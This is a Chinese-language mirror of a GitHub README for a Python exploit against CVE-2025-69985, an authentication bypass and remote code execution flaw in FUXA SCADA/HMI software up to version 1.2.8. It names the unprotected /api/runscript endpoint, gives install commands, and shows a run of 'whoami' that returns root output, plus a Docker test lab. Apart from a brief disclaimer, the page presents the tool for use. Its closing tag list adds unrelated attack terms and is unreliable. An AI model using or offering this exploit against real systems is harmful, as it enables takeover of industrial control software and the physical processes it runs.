joshuavanderpoll/CVE-2025-69985
GitHub: joshuavanderpoll/CVE-2025-69985
针对 FUXA SCADA/HMI 软件 1.2.8 及以下版本认证绕过与远程代码执行漏洞的 Python 利用工具。
Stars: 1 | Forks: 0
FUXA ≤ 1.2.8 认证绕过 + RCE (CVE-2025-69985)
## 📜 描述 此 Python exploit 针对 CVE-2025-69985,这是 FUXA(基于 Web 的 SCADA/HMI 软件)版本 ≤ 1.2.8 中的一个严重认证绕过漏洞。通过向未受保护的 `/api/runscript` 端点发送包含嵌入 Node.js 代码的精心构造的 JSON payload,它以 FUXA 进程的权限实现远程命令执行,并在响应中同步捕获完整的 stdout/stderr。 ## 🛠️ 安装说明 ### OSX/Linux ``` git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git cd CVE-2025-69985 python3 -m venv .venv source .venv/bin/activate pip3 install -r requirements.txt ``` ### Windows ``` git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git cd CVE-2025-69985 python -m venv .venv .venv\Scripts\activate pip3 install -r requirements.txt ``` ## ⚙️ 用法 ``` python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami Target : http://localhost:1881 Command: whoami [*] Preparing payload → executing: whoami [*] Sending exploit request to /api/runscript ... [*] Response status: 200 [+] Command executed successfully (CVE-2025-69985 bypass)! === COMMAND OUTPUT === "root\n" ====================== ====================================================================== Exploit completed!. ====================================================================== ``` ## 🐋 Docker PoC ``` cd docker/ docker compose down docker compose up -d # 你可以在 --url http://127.0.0.1:1881/ 进行测试 ``` ## 💻 示例  ## 📢 免责声明 本工具仅供教育和研究目的提供。创建者对因使用本工具而导致的任何误用或损害不承担任何责任。标签:API漏洞, Auth Bypass, CISA项目, CVE-2025-69985, Exploit, FUXA, GNU通用公共许可证, HMI, Homebrew安装, ICS, MITM代理, Node.js, NTLM Relay, PKINIT, PoC, Python, RCE, SCADA, 哈希传递, 工控安全, 无后门, 暴力破解, 编程工具, 网络安全, 认证绕过, 请求拦截, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞